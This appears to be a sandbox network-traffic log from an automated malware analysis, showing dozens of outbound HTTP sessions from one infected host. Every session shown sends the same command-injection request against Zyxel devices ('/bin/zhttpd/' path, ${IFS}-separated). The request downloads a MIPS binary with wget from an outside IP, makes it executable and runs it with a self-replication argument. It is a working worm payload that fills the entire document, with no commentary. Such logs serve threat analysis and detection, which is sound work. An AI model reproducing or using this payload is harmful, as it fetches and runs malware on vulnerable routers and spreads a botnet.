                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            57192.168.2.134976092.252.205.172443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385400057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            58192.168.2.1337502152.117.53.26443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385411024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            59192.168.2.135998662.239.101.163443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385449886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            60192.168.2.1353324155.118.159.126443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385509968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            61192.168.2.133723449.234.115.64443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385540009 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            62192.168.2.1351474210.169.67.60443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385567904 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            63192.168.2.134162614.109.21.22443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385627031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            64192.168.2.13434441.142.242.25443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385680914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            65192.168.2.133538094.128.241.44443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385694027 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            66192.168.2.1342060162.153.2.108443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385730982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            67192.168.2.1335110154.17.237.210443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385781050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            68192.168.2.1349810165.226.210.39443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385814905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            69192.168.2.1333284189.45.205.217443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385875940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            70192.168.2.134465666.143.214.27443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385883093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            71192.168.2.1336318160.40.210.190443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385904074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            72192.168.2.135365453.138.175.182443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.385938883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            73192.168.2.1345054138.146.26.217443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386032104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            74192.168.2.135018692.224.175.249443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386032104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            75192.168.2.133758853.236.60.204443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386048079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            76192.168.2.1350270166.94.44.116443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386123896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            77192.168.2.1353014190.124.91.181443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386130095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            78192.168.2.135370498.108.96.154443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386161089 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            79192.168.2.134739863.85.200.170443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386182070 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            80192.168.2.135179264.180.91.142443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386231899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            81192.168.2.1351294143.118.200.148443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386275053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            82192.168.2.134748864.166.107.175443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386323929 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            83192.168.2.134919636.64.114.29443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386342049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            84192.168.2.1341712182.209.34.139443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386347055 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            85192.168.2.1344310169.165.105.122443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386387110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            86192.168.2.135439432.198.233.215443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386421919 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            87192.168.2.1360140122.227.21.184443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386486053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            88192.168.2.134174025.88.16.179443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386533976 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            89192.168.2.1334454150.165.224.185443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386703968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            90192.168.2.1345268108.48.88.47443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386727095 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            91192.168.2.135958496.172.82.234443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386759996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            92192.168.2.1338472119.77.112.131443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386785984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            93192.168.2.1356588177.107.227.251443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386826038 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            94192.168.2.1345344104.68.160.185443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386877060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            95192.168.2.1357982167.22.142.240443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386903048 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            96192.168.2.1348158210.20.248.9443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386946917 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            97192.168.2.1349206160.157.204.38443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386965036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            98192.168.2.135176445.15.211.150443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.386981964 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            99192.168.2.135280467.69.217.76443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.387029886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            100192.168.2.1357798137.216.222.58443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.387058973 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            101192.168.2.1355374100.16.41.179443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.387089968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            102192.168.2.135427637.239.32.209443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.387140036 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            103192.168.2.1360290153.197.59.250443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.387147903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            104192.168.2.133563666.250.216.130443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.387197971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            105192.168.2.135667217.32.45.245443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.387232065 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            106192.168.2.134916884.197.171.95443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.387259007 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            107192.168.2.133782292.79.33.227443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.387300014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            108192.168.2.1353168150.91.75.217443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.387362003 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            109192.168.2.135026039.117.184.201443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.387464046 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            110192.168.2.1338860157.82.30.151443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.387521029 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            111192.168.2.13393225.248.140.177443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.387521982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            112192.168.2.1358384159.68.111.246443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.387576103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            113192.168.2.1346094174.29.25.186443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.387607098 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            114192.168.2.1333800189.92.117.77443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.387675047 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            115192.168.2.134079666.3.216.81443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.387676954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            116192.168.2.1349526153.23.101.254443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:58.387705088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            117192.168.2.13413704.252.136.141443
                                                            TimestampBytes transferredDirectionData
                                                            Jan 28, 2024 10:11:59.394756079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            118192.168.2.1340540194.59.82.234443
                                                            TimestampBytes transferredDirectionData
